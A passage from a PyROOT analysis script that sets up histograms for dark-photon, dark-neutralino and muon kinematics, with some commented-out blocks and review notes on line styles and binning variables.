h_n1_2_p = ROOT.TH1F("h_n1_2_p", "h_n1_2_p", 300, 0, 300)
h_n1_2_p.SetLineColor(ROOT.kRed)
h_n1_2_p.SetLineWidth(2)
h_n1_2_p.SetLineStyle(1)
#h_n1_2_M = ROOT.TH1F("h_n1_2_M", "h_n1_2_M", 200, 0.05, 20.05)
#h_n1_2_M.SetLineColor(ROOT.kRed)
#h_n1_2_M.SetLineWidth(2)
#h_n1_2_M.SetLineStyle(1)
h_n1_2_pT = ROOT.TH1F("h_n1_2_pT", "h_n1_2_pT", 70, 0, 70)
h_n1_2_pT.SetLineColor(ROOT.kRed)
h_n1_2_pT.SetLineWidth(2)
h_n1_2_pT.SetLineStyle(1)
h_nD_1_pT_dummy = ROOT.TH1F("h_nD_1_pT_dummy", "h_nD_1_pT_dummy", 130, 0, 130)
h_nD_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_pT_dummy.SetXTitle("p_{T} of n_{D} [GeV]")
h_nD_1_pT_dummy.SetMaximum( 0.1 )
h_n1_2_pZ = ROOT.TH1F("h_n1_2_pZ", "h_n1_2_pZ", 300, 0, 300)
h_n1_2_pZ.SetLineColor(ROOT.kRed)
h_n1_2_pZ.SetLineWidth(2)
h_n1_2_pZ.SetLineStyle(1)
h_nD_1_pZ_dummy = ROOT.TH1F("h_nD_1_pZ_dummy", "h_nD_1_pZ_dummy", 130, 0, 130)
h_nD_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_pZ_dummy.SetXTitle("|p_{Z}| of n_{D} [GeV]")
h_nD_1_pZ_dummy.SetMaximum( 0.1 )
h_n1_2_Eta = ROOT.TH1F("h_n1_2_Eta", "h_n1_2_Eta", 100,-5,5)
h_n1_2_Eta.SetLineColor(ROOT.kRed)
h_n1_2_Eta.SetLineWidth(2)
h_n1_2_Eta.SetLineStyle(1)
h_nD_1_Eta_dummy = ROOT.TH1F("h_nD_1_Eta_dummy", "h_nD_1_Eta_dummy", 100,-5,5)
h_nD_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_nD_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_Eta_dummy.SetXTitle("#eta of n_{D}")
h_nD_1_Eta_dummy.SetMaximum( 0.1 )
h_n1_2_Phi = ROOT.TH1F("h_n1_2_Phi", "h_n1_2_Phi", 80,-4,4)
h_n1_2_Phi.SetLineColor(ROOT.kRed)
h_n1_2_Phi.SetLineWidth(2)
h_n1_2_Phi.SetLineStyle(1)
h_nD_1_Phi_dummy = ROOT.TH1F("h_nD_1_Phi_dummy", "h_nD_1_Phi_dummy", 80,-4,4)
h_nD_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_nD_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_Phi_dummy.SetXTitle("#phi of n_{D} [rad]")
h_nD_1_Phi_dummy.SetMaximum( 0.05 )
h_nD_1_p_dummy = ROOT.TH1F("h_nD_1_p_dummy", "h_nD_1_p_dummy", 130, 0, 130)
h_nD_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_p_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_p_dummy.SetXTitle("p of n_{D} [GeV]")
h_nD_1_p_dummy.SetMaximum( 0.1 )
h_nD_1_M_dummy = ROOT.TH1F("h_nD_1_M_dummy", "h_nD_1_M_dummy", 20, 0.05, 2.05)
h_nD_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_nD_1_M_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_M_dummy.SetXTitle("Mass of n_{D} [GeV]")
h_nD_1_M_dummy.SetMaximum( 1.6 )
h_nD_1_p = ROOT.TH1F("h_nD_1_p", "h_nD_1_p", 130, 0, 130)
h_nD_1_p.SetLineColor(ROOT.kBlue)
h_nD_1_p.SetLineWidth(2)
h_nD_1_p.SetLineStyle(1)
h_nD_1_M = ROOT.TH1F("h_nD_1_M", "h_nD_1_M", 20, 0.05, 2.05)
h_nD_1_M.SetLineColor(ROOT.kBlue)
h_nD_1_M.SetLineWidth(2)
h_nD_1_M.SetLineStyle(1)
h_nD_1_pT = ROOT.TH1F("h_nD_1_pT", "h_nD_1_pT", 130, 0, 130)
h_nD_1_pT.SetLineColor(ROOT.kBlue)
h_nD_1_pT.SetLineWidth(2)
h_nD_1_pT.SetLineStyle(1)
h_nD_1_pZ = ROOT.TH1F("h_nD_1_pZ", "h_nD_1_pZ", 130, 0, 130)
h_nD_1_pZ.SetLineColor(ROOT.kBlue)
h_nD_1_pZ.SetLineWidth(2)
h_nD_1_pZ.SetLineStyle(1)
h_nD_1_Eta = ROOT.TH1F("h_nD_1_Eta", "h_nD_1_Eta", 100,-5,5)
h_nD_1_Eta.SetLineColor(ROOT.kBlue)
h_nD_1_Eta.SetLineWidth(2)
h_nD_1_Eta.SetLineStyle(1)
h_nD_1_Phi = ROOT.TH1F("h_nD_1_Phi", "h_nD_1_Phi", 80,-4,4)
h_nD_1_Phi.SetLineColor(ROOT.kBlue)
h_nD_1_Phi.SetLineWidth(2)
h_nD_1_Phi.SetLineStyle(1)
# --- nD sub-leading and gammaD (dark photon) kinematic histograms. ---
# Same convention as above: "*_dummy" histograms only define axes,
# "_1" (blue) is the leading candidate, "_2" (red) the sub-leading one.
#h_nD_2_pT_dummy = ROOT.TH1F("h_nD_2_pT_dummy", "h_nD_2_pT_dummy", 100, 0, 100)
#h_nD_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_pT_dummy.SetXTitle("p_{T nD_2} [GeV]")
#h_nD_2_pT_dummy.SetMaximum( 0.01 )
#
#h_nD_2_p_dummy = ROOT.TH1F("h_nD_2_p_dummy", "h_nD_2_p_dummy", 100, 0, 100)
#h_nD_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_p_dummy.SetXTitle("p_{nD_2} [GeV]")
#h_nD_2_p_dummy.SetMaximum( 0.01 )
#
#h_nD_2_M_dummy = ROOT.TH1F("h_nD_2_M_dummy", "h_nD_2_M_dummy", 20, 0, 2)
#h_nD_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_M_dummy.SetXTitle("m_{nD_2} [GeV]")
#h_nD_2_M_dummy.SetMaximum( 1.2 )
h_nD_2_p = ROOT.TH1F("h_nD_2_p", "h_nD_2_p", 130, 0, 130)
h_nD_2_p.SetLineColor(ROOT.kRed)
h_nD_2_p.SetLineWidth(2)
h_nD_2_p.SetLineStyle(1)
#h_nD_2_M = ROOT.TH1F("h_nD_2_M", "h_nD_2_M", 20, 0.05, 2.05)
#h_nD_2_M.SetLineColor(ROOT.kRed)
#h_nD_2_M.SetLineWidth(2)
#h_nD_2_M.SetLineStyle(1)
h_nD_2_pT = ROOT.TH1F("h_nD_2_pT", "h_nD_2_pT", 130, 0, 130)
h_nD_2_pT.SetLineColor(ROOT.kRed)
h_nD_2_pT.SetLineWidth(2)
h_nD_2_pT.SetLineStyle(1)
h_gammaD_1_pT_dummy = ROOT.TH1F("h_gammaD_1_pT_dummy", "h_gammaD_1_pT_dummy", 100, 0, 100)
h_gammaD_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_pT_dummy.SetXTitle("p_{T} of #gamma_{D} [GeV]")
h_gammaD_1_pT_dummy.SetMaximum( 0.1 )
h_nD_2_pZ = ROOT.TH1F("h_nD_2_pZ", "h_nD_2_pZ", 130, 0, 130)
h_nD_2_pZ.SetLineColor(ROOT.kRed)
h_nD_2_pZ.SetLineWidth(2)
h_nD_2_pZ.SetLineStyle(1)
h_gammaD_1_pZ_dummy = ROOT.TH1F("h_gammaD_1_pZ_dummy", "h_gammaD_1_pZ_dummy", 100, 0, 100)
h_gammaD_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_pZ_dummy.SetXTitle("|p_{Z}| of #gamma_{D} [GeV]")
h_gammaD_1_pZ_dummy.SetMaximum( 0.1 )
h_nD_2_Eta = ROOT.TH1F("h_nD_2_Eta", "h_nD_2_Eta", 100,-5,5)
h_nD_2_Eta.SetLineColor(ROOT.kRed)
h_nD_2_Eta.SetLineWidth(2)
h_nD_2_Eta.SetLineStyle(1)
h_gammaD_1_Eta_dummy = ROOT.TH1F("h_gammaD_1_Eta_dummy", "h_gammaD_1_Eta_dummy",100,-5,5)
h_gammaD_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_gammaD_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_Eta_dummy.SetXTitle("#eta of #gamma_{D}")
h_gammaD_1_Eta_dummy.SetMaximum( 0.1 )
h_nD_2_Phi = ROOT.TH1F("h_nD_2_Phi", "h_nD_2_Phi", 80,-4,4)
h_nD_2_Phi.SetLineColor(ROOT.kRed)
h_nD_2_Phi.SetLineWidth(2)
h_nD_2_Phi.SetLineStyle(1)
h_gammaD_1_Phi_dummy = ROOT.TH1F("h_gammaD_1_Phi_dummy", "h_gammaD_1_Phi_dummy",80,-4,4 )
h_gammaD_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_gammaD_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_Phi_dummy.SetXTitle("#phi of #gamma_{D} [rad]")
h_gammaD_1_Phi_dummy.SetMaximum( 0.05 )
h_gammaD_1_p_dummy = ROOT.TH1F("h_gammaD_1_p_dummy", "h_gammaD_1_p_dummy", 100, 0, 100)
h_gammaD_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_p_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_p_dummy.SetXTitle("p of #gamma_{D} [GeV]")
h_gammaD_1_p_dummy.SetMaximum( 0.1 )
h_gammaD_1_M_dummy = ROOT.TH1F("h_gammaD_1_M_dummy", "h_gammaD_1_M_dummy", 101, 0.1, 10.1)
h_gammaD_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_gammaD_1_M_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_M_dummy.SetXTitle("Mass of #gamma_{D} [GeV]")
h_gammaD_1_M_dummy.SetMaximum( 1.4 )
h_gammaD_1_p = ROOT.TH1F("h_gammaD_1_p", "h_gammaD_1_p", 100, 0, 100)
h_gammaD_1_p.SetLineColor(ROOT.kBlue)
h_gammaD_1_p.SetLineWidth(2)
h_gammaD_1_p.SetLineStyle(1)
h_gammaD_1_M = ROOT.TH1F("h_gammaD_1_M", "h_gammaD_1_M", 101, 0.1, 10.1)
h_gammaD_1_M.SetLineColor(ROOT.kBlue)
h_gammaD_1_M.SetLineWidth(2)
h_gammaD_1_M.SetLineStyle(1)
h_gammaD_1_pT = ROOT.TH1F("h_gammaD_1_pT", "h_gammaD_1_pT", 100, 0, 100)
h_gammaD_1_pT.SetLineColor(ROOT.kBlue)
h_gammaD_1_pT.SetLineWidth(2)
h_gammaD_1_pT.SetLineStyle(1)
h_gammaD_1_pZ = ROOT.TH1F("h_gammaD_1_pZ", "h_gammaD_1_pZ", 100, 0, 100)
h_gammaD_1_pZ.SetLineColor(ROOT.kBlue)
h_gammaD_1_pZ.SetLineWidth(2)
h_gammaD_1_pZ.SetLineStyle(1)
h_gammaD_1_Eta = ROOT.TH1F("h_gammaD_1_Eta", "h_gammaD_1_Eta",100,-5,5)
h_gammaD_1_Eta.SetLineColor(ROOT.kBlue)
h_gammaD_1_Eta.SetLineWidth(2)
h_gammaD_1_Eta.SetLineStyle(1)
h_gammaD_1_Phi = ROOT.TH1F("h_gammaD_1_Phi", "h_gammaD_1_Phi", 80,-4,4)
h_gammaD_1_Phi.SetLineColor(ROOT.kBlue)
h_gammaD_1_Phi.SetLineWidth(2)
h_gammaD_1_Phi.SetLineStyle(1)
#h_gammaD_2_pT_dummy = ROOT.TH1F("h_gammaD_2_pT_dummy", "h_gammaD_2_pT_dummy", 100, 0, 100)
#h_gammaD_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_pT_dummy.SetXTitle("p_{T gammaD_2} [GeV]")
#h_gammaD_2_pT_dummy.SetMaximum( 0.01 )
#
#h_gammaD_2_p_dummy = ROOT.TH1F("h_gammaD_2_p_dummy", "h_gammaD_2_p_dummy", 100, 0, 100)
#h_gammaD_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_p_dummy.SetXTitle("p_{gammaD_2} [GeV]")
#h_gammaD_2_p_dummy.SetMaximum( 0.01 )
#
#h_gammaD_2_M_dummy = ROOT.TH1F("h_gammaD_2_M_dummy", "h_gammaD_2_M_dummy", 300, 0, 3)
#h_gammaD_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_M_dummy.SetXTitle("m_{gammaD_2} [GeV]")
#h_gammaD_2_M_dummy.SetMaximum( 1.2 )
h_gammaD_2_p = ROOT.TH1F("h_gammaD_2_p", "h_gammaD_2_p", 100, 0, 100)
h_gammaD_2_p.SetLineColor(ROOT.kRed)
h_gammaD_2_p.SetLineWidth(2)
h_gammaD_2_p.SetLineStyle(1)
#h_gammaD_2_M = ROOT.TH1F("h_gammaD_2_M", "h_gammaD_2_M", 500, 0.005, 10.005)
#h_gammaD_2_M.SetLineColor(ROOT.kRed)
#h_gammaD_2_M.SetLineWidth(2)
#h_gammaD_2_M.SetLineStyle(1)
h_gammaD_2_pT = ROOT.TH1F("h_gammaD_2_pT", "h_gammaD_2_pT", 100, 0, 100)
h_gammaD_2_pT.SetLineColor(ROOT.kRed)
h_gammaD_2_pT.SetLineWidth(2)
h_gammaD_2_pT.SetLineStyle(1)
h_gammaD_2_pZ = ROOT.TH1F("h_gammaD_2_pZ", "h_gammaD_2_pZ", 100, 0, 100)
h_gammaD_2_pZ.SetLineColor(ROOT.kRed)
h_gammaD_2_pZ.SetLineWidth(2)
h_gammaD_2_pZ.SetLineStyle(1)
h_gammaD_2_Eta = ROOT.TH1F("h_gammaD_2_Eta", "h_gammaD_2_Eta", 100,-5,5)
h_gammaD_2_Eta.SetLineColor(ROOT.kRed)
h_gammaD_2_Eta.SetLineWidth(2)
h_gammaD_2_Eta.SetLineStyle(1)
h_gammaD_2_Phi = ROOT.TH1F("h_gammaD_2_Phi", "h_gammaD_2_Phi", 80,-4,4)
h_gammaD_2_Phi.SetLineColor(ROOT.kRed)
h_gammaD_2_Phi.SetLineWidth(2)
h_gammaD_2_Phi.SetLineStyle(1)
# --- Per-muon kinematics, indexed 0-3 by pT rank. ---
# Colors/styles: 0 = blue solid, 1 = green dashed, 2 = red dotted,
# 3 = black dash-dotted.
# NOTE(review): nBins/binMin/binMax here come from an assignment earlier in
# the file (outside this view) — confirm their values before reusing.
h_muon_pT_0 = ROOT.TH1F("h_muon_pT_0", "h_muon_pT_0", nBins, binMin, binMax)
h_muon_pT_0.SetLineColor(ROOT.kBlue)
h_muon_pT_0.SetLineWidth(2)
h_muon_pT_0.SetLineStyle(1)
h_muon_pT_1 = ROOT.TH1F("h_muon_pT_1", "h_muon_pT_1", nBins, binMin, binMax)
h_muon_pT_1.SetLineColor(ROOT.kGreen)
h_muon_pT_1.SetLineWidth(2)
h_muon_pT_1.SetLineStyle(2)
h_muon_pT_2 = ROOT.TH1F("h_muon_pT_2", "h_muon_pT_2", nBins, binMin, binMax)
h_muon_pT_2.SetLineColor(ROOT.kRed)
h_muon_pT_2.SetLineWidth(2)
h_muon_pT_2.SetLineStyle(3)
h_muon_pT_3 = ROOT.TH1F("h_muon_pT_3", "h_muon_pT_3", nBins, binMin, binMax)
h_muon_pT_3.SetLineColor(ROOT.kBlack)
h_muon_pT_3.SetLineWidth(2)
h_muon_pT_3.SetLineStyle(4)
h_muon_phi_dummy = ROOT.TH1F("h_muon_phi_dummy", "h_muon_phi_dummy", 80, -4, 4)
h_muon_phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_muon_phi_dummy.SetTitleOffset(1.35, "Y")
h_muon_phi_dummy.SetXTitle("#phi of #mu [rad]")
h_muon_phi_dummy.SetMaximum( 0.1 )
h_muon_phi_0 = ROOT.TH1F("h_muon_phi_0", "h_muon_phi_0", 80, -4, 4)
h_muon_phi_0.SetLineColor(ROOT.kBlue)
h_muon_phi_0.SetLineWidth(2)
h_muon_phi_0.SetLineStyle(1)
h_muon_phi_1 = ROOT.TH1F("h_muon_phi_1", "h_muon_phi_1", 80, -4, 4)
h_muon_phi_1.SetLineColor(ROOT.kGreen)
h_muon_phi_1.SetLineWidth(2)
h_muon_phi_1.SetLineStyle(2)
h_muon_phi_2 = ROOT.TH1F("h_muon_phi_2", "h_muon_phi_2", 80, -4, 4)
h_muon_phi_2.SetLineColor(ROOT.kRed)
h_muon_phi_2.SetLineWidth(2)
h_muon_phi_2.SetLineStyle(3)
h_muon_phi_3 = ROOT.TH1F("h_muon_phi_3", "h_muon_phi_3", 80, -4, 4)
h_muon_phi_3.SetLineColor(ROOT.kBlack)
h_muon_phi_3.SetLineWidth(2)
h_muon_phi_3.SetLineStyle(4)
h_muon_p_dummy = ROOT.TH1F("h_muon_p_dummy", "h_muon_p_dummy", 125, 0, 125)
h_muon_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_p_dummy.SetTitleOffset(1.35, "Y")
h_muon_p_dummy.SetXTitle("p of #mu [GeV]")
h_muon_p_dummy.SetMaximum( 0.2 )
h_muon_p_0 = ROOT.TH1F("h_muon_p_0", "h_muon_p_0", 125, 0, 125)
h_muon_p_0.SetLineColor(ROOT.kBlue)
h_muon_p_0.SetLineWidth(2)
h_muon_p_0.SetLineStyle(1)
h_muon_p_1 = ROOT.TH1F("h_muon_p_1", "h_muon_p_1", 125, 0, 125)
h_muon_p_1.SetLineColor(ROOT.kGreen)
h_muon_p_1.SetLineWidth(2)
h_muon_p_1.SetLineStyle(2)
h_muon_p_2 = ROOT.TH1F("h_muon_p_2", "h_muon_p_2", 125, 0, 125)
h_muon_p_2.SetLineColor(ROOT.kRed)
h_muon_p_2.SetLineWidth(2)
h_muon_p_2.SetLineStyle(3)
# p of the 4th (pT-ordered) muon: black, dash-dotted like its pT/phi/eta
# counterparts.
h_muon_p_3 = ROOT.TH1F("h_muon_p_3", "h_muon_p_3", 125, 0, 125)
h_muon_p_3.SetLineColor(ROOT.kBlack)
h_muon_p_3.SetLineWidth(2)
# Fixed: was SetLineStyle(125) — not a valid ROOT line style (valid 1-10),
# almost certainly a copy-paste of the 125-bin binning. Every other "_3"
# histogram in this family uses style 4.
h_muon_p_3.SetLineStyle(4)
# |pZ| of the four pT-ordered muons (same color/style scheme as above).
h_muon_pZ_0 = ROOT.TH1F("h_muon_pZ_0", "h_muon_pZ_0", 125, 0, 125)
h_muon_pZ_0.SetLineColor(ROOT.kBlue)
h_muon_pZ_0.SetLineWidth(2)
h_muon_pZ_0.SetLineStyle(1)
h_muon_pZ_1 = ROOT.TH1F("h_muon_pZ_1", "h_muon_pZ_1", 125, 0, 125)
h_muon_pZ_1.SetLineColor(ROOT.kGreen)
h_muon_pZ_1.SetLineWidth(2)
h_muon_pZ_1.SetLineStyle(2)
h_muon_pZ_2 = ROOT.TH1F("h_muon_pZ_2", "h_muon_pZ_2", 125, 0, 125)
h_muon_pZ_2.SetLineColor(ROOT.kRed)
h_muon_pZ_2.SetLineWidth(2)
h_muon_pZ_2.SetLineStyle(3)
# |pZ| of the 4th (pT-ordered) muon: black, dash-dotted like its pT/phi/eta
# counterparts.
h_muon_pZ_3 = ROOT.TH1F("h_muon_pZ_3", "h_muon_pZ_3", 125, 0, 125)
h_muon_pZ_3.SetLineColor(ROOT.kBlack)
h_muon_pZ_3.SetLineWidth(2)
# Fixed: was SetLineStyle(125) — not a valid ROOT line style (valid 1-10),
# almost certainly a copy-paste of the 125-bin binning. Every other "_3"
# histogram in this family uses style 4.
h_muon_pZ_3.SetLineStyle(4)
################################################################################
# eta of muons
################################################################################
# NOTE(review): nBins/binMin/binMax are reassigned here but the histograms
# below use the literals (100, -5, 5) instead — these three values appear to
# be dead until they are reassigned again in the dimuon-mass section.
nBins = 60
binMin = -3.0
binMax = 3.0
yMax = 0.045
h_muon_eta_dummy = ROOT.TH1F("h_muon_eta_dummy", "h_muon_eta_dummy", 100, -5, 5)
h_muon_eta_dummy.SetYTitle("Fraction of events / 0.1")
h_muon_eta_dummy.GetYaxis().SetNdivisions(508);
h_muon_eta_dummy.SetTitleOffset(1.35, "Y")
h_muon_eta_dummy.SetXTitle("#eta of #mu")
h_muon_eta_dummy.SetMaximum( yMax )
h_muon_eta_0 = ROOT.TH1F("h_muon_eta_0", "h_muon_eta_0", 100,-5,5)
h_muon_eta_0.SetLineColor(ROOT.kBlue)
h_muon_eta_0.SetLineWidth(2)
h_muon_eta_0.SetLineStyle(1)
h_muon_eta_1 = ROOT.TH1F("h_muon_eta_1", "h_muon_eta_1", 100,-5,5)
h_muon_eta_1.SetLineColor(ROOT.kGreen)
h_muon_eta_1.SetLineWidth(2)
h_muon_eta_1.SetLineStyle(2)
h_muon_eta_2 = ROOT.TH1F("h_muon_eta_2", "h_muon_eta_2", 100,-5,5)
h_muon_eta_2.SetLineColor(ROOT.kRed)
h_muon_eta_2.SetLineWidth(2)
h_muon_eta_2.SetLineStyle(3)
h_muon_eta_3 = ROOT.TH1F("h_muon_eta_3", "h_muon_eta_3", 100,-5,5)
h_muon_eta_3.SetLineColor(ROOT.kBlack)
h_muon_eta_3.SetLineWidth(2)
h_muon_eta_3.SetLineStyle(4)
################################################################################
# mass of dimuons
################################################################################
# nBins/binMin/binMax set here ARE used below by the uncommented
# h_dimuon_m_fake_dummy / h_dimuon_m_fake_0 histograms.
nBins = 125
binMin = 0.0
binMax = 125.0
yMax = 0.4
#h_dimuon_m_dummy = ROOT.TH1F("h_dimuon_m_dummy", "h_dimuon_m_dummy", nBins, binMin, binMax)
#h_dimuon_m_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_0 = ROOT.TH1F("h_dimuon_m_0", "h_dimuon_m_0", nBins, binMin, binMax)
#h_dimuon_m_0.SetLineColor(ROOT.kBlue)
#h_dimuon_m_0.SetLineWidth(2)
#h_dimuon_m_0.SetLineStyle(1)
#
#h_dimuon_m_1 = ROOT.TH1F("h_dimuon_m_1", "h_dimuon_m_1", nBins, binMin, binMax)
#h_dimuon_m_1.SetLineColor(ROOT.kGreen)
#h_dimuon_m_1.SetLineWidth(2)
#h_dimuon_m_1.SetLineStyle(2)
#
#h_dimuon_m_2 = ROOT.TH1F("h_dimuon_m_2", "h_dimuon_m_2", nBins, binMin, binMax)
#h_dimuon_m_2.SetLineColor(ROOT.kRed)
#h_dimuon_m_2.SetLineWidth(2)
#h_dimuon_m_2.SetLineStyle(3)
#
#h_dimuon_m_3 = ROOT.TH1F("h_dimuon_m_3", "h_dimuon_m_3", nBins, binMin, binMax)
#h_dimuon_m_3.SetLineColor(ROOT.kBlack)
#h_dimuon_m_3.SetLineWidth(2)
#h_dimuon_m_3.SetLineStyle(4)
#
#h_dimuon_m_log_dummy = ROOT.TH1F("h_dimuon_m_log_dummy", "h_dimuon_m_log_dummy", nBins, binMin, binMax)
#h_dimuon_m_log_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_log_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_log_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_log_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_log_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_log_0 = ROOT.TH1F("h_dimuon_m_log_0", "h_dimuon_m_log_0", nBins, binMin, binMax)
#h_dimuon_m_log_0.SetLineColor(ROOT.kBlue)
#h_dimuon_m_log_0.SetLineWidth(2)
#h_dimuon_m_log_0.SetLineStyle(1)
#
#h_dimuon_m_log_1 = ROOT.TH1F("h_dimuon_m_log_1", "h_dimuon_m_log_1", nBins, binMin, binMax)
#h_dimuon_m_log_1.SetLineColor(ROOT.kGreen)
#h_dimuon_m_log_1.SetLineWidth(2)
#h_dimuon_m_log_1.SetLineStyle(2)
#
#h_dimuon_m_log_2 = ROOT.TH1F("h_dimuon_m_log_2", "h_dimuon_m_log_2", nBins, binMin, binMax)
#h_dimuon_m_log_2.SetLineColor(ROOT.kRed)
#h_dimuon_m_log_2.SetLineWidth(2)
#h_dimuon_m_log_2.SetLineStyle(3)
#
#h_dimuon_m_log_3 = ROOT.TH1F("h_dimuon_m_log_3", "h_dimuon_m_log_3", nBins, binMin, binMax)
#h_dimuon_m_log_3.SetLineColor(ROOT.kBlack)
#h_dimuon_m_log_3.SetLineWidth(2)
#h_dimuon_m_log_3.SetLineStyle(4)
#
#h_dimuon_m_real_fake_dummy = ROOT.TH1F("h_dimuon_m_real_fake_dummy", "h_dimuon_m_real_fake_dummy", nBins, binMin, binMax)
#h_dimuon_m_real_fake_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_real_fake_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_real_fake_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_real_fake_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_real_fake_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_real_fake_0 = ROOT.TH1F("h_dimuon_m_real_fake_0", "h_dimuon_m_real_fake_0", nBins, binMin, binMax)
#h_dimuon_m_real_fake_0.SetLineColor(ROOT.kRed)
#h_dimuon_m_real_fake_0.SetLineWidth(2)
#h_dimuon_m_real_fake_0.SetLineStyle(1)
#
#h_dimuon_m_real_fake_1 = ROOT.TH1F("h_dimuon_m_real_fake_1", "h_dimuon_m_real_fake_1", nBins, binMin, binMax)
#h_dimuon_m_real_fake_1.SetLineColor(ROOT.kBlue)
#h_dimuon_m_real_fake_1.SetLineWidth(2)
#h_dimuon_m_real_fake_1.SetLineStyle(2)
#
#h_dimuon_m_real_fake_log_dummy = ROOT.TH1F("h_dimuon_m_real_fake_log_dummy", "h_dimuon_m_real_fake_log_dummy", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_real_fake_log_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_real_fake_log_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_real_fake_log_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_real_fake_log_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_real_fake_log_0 = ROOT.TH1F("h_dimuon_m_real_fake_log_0", "h_dimuon_m_real_fake_log_0", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_0.SetLineColor(ROOT.kRed)
#h_dimuon_m_real_fake_log_0.SetLineWidth(2)
#h_dimuon_m_real_fake_log_0.SetLineStyle(1)
#
#h_dimuon_m_real_fake_log_1 = ROOT.TH1F("h_dimuon_m_real_fake_log_1", "h_dimuon_m_real_fake_log_1", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_1.SetLineColor(ROOT.kBlue)
#h_dimuon_m_real_fake_log_1.SetLineWidth(2)
#h_dimuon_m_real_fake_log_1.SetLineStyle(2)
#########################
# Mass of "fake" dimuon pairings (wrongly paired muons), fine-binned for the
# log-scale plot and coarse-binned for the linear one.
h_dimuon_m_fake_log_dummy = ROOT.TH1F("h_dimuon_m_fake_log_dummy", "h_dimuon_m_fake_log_dummy", 1250, 0, 125)
h_dimuon_m_fake_log_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_dimuon_m_fake_log_dummy.GetYaxis().SetNdivisions(508);
h_dimuon_m_fake_log_dummy.SetTitleOffset(1.4, "Y")
h_dimuon_m_fake_log_dummy.SetXTitle("Mass of Fake #mu#mu [GeV]")
h_dimuon_m_fake_log_dummy.SetMaximum( 1 )
h_dimuon_m_fake_log_0 = ROOT.TH1F("h_dimuon_m_fake_log_0", "h_dimuon_m_fake_log_0", 1250, 0, 125)
h_dimuon_m_fake_log_0.SetLineColor(ROOT.kRed)
h_dimuon_m_fake_log_0.SetLineWidth(2)
h_dimuon_m_fake_log_0.SetLineStyle(1)
h_dimuon_m_fake_dummy = ROOT.TH1F("h_dimuon_m_fake_dummy", "h_dimuon_m_fake_dummy", nBins, binMin, binMax)
h_dimuon_m_fake_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_m_fake_dummy.GetYaxis().SetNdivisions(508);
h_dimuon_m_fake_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_m_fake_dummy.SetXTitle("Mass of Fake #mu#mu [GeV]")
h_dimuon_m_fake_dummy.SetMaximum( 1.2 )
h_dimuon_m_fake_0 = ROOT.TH1F("h_dimuon_m_fake_0", "h_dimuon_m_fake_0", nBins, binMin, binMax)
h_dimuon_m_fake_0.SetLineColor(ROOT.kRed)
h_dimuon_m_fake_0.SetLineWidth(2)
